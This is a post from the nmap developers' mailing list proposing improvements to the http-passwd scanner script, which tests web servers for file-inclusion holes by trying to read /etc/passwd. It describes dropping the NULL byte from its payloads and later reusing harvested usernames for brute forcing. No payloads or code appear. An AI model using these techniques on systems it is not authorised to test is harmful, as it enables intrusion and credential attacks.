[NSE] http-passwd improvements

[George Chatzisofroniou <sophron () latthi com>]

Hi,

While i was testing http-passwd i encountered some cases where the script won't
work even if the target is vulnerable. These are the cases where target's
'include' function won't accept paths with NULL in them, hence all of the
script's payloads would fail. For example, the NULL byte string vulnerability
was fixed as of PHP 5.3.4 [1], and the script would have no effect there.

I made a commit (r32855) that sends the same payloads to the target this time
without appending the NULL byte. This will work against targets that allow user
input to determine the file path without any sanitization or checks.

There is more room for improvement on this script:

* It should make use of NSE's HTTP crawler.

* It should check for something that looks like a query referring to a file name
not only in the HTTP body response but in the requested URL as well.

* It should contain more payloads forcing the script to download itself. Check
this thread [2].

* If the script is able to retrieve /etc/passwd, it should cache the usernames
(for example the UNIX accounts with ID >= 1000) so that the brute library can
make use of them later.

[1]: http://svn.php.net/viewvc?view=revision&revision=305507
[2]: http://seclists.org/nmap-dev/2014/q1/177

Cheers,

-- 
George Chatzisofroniou
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/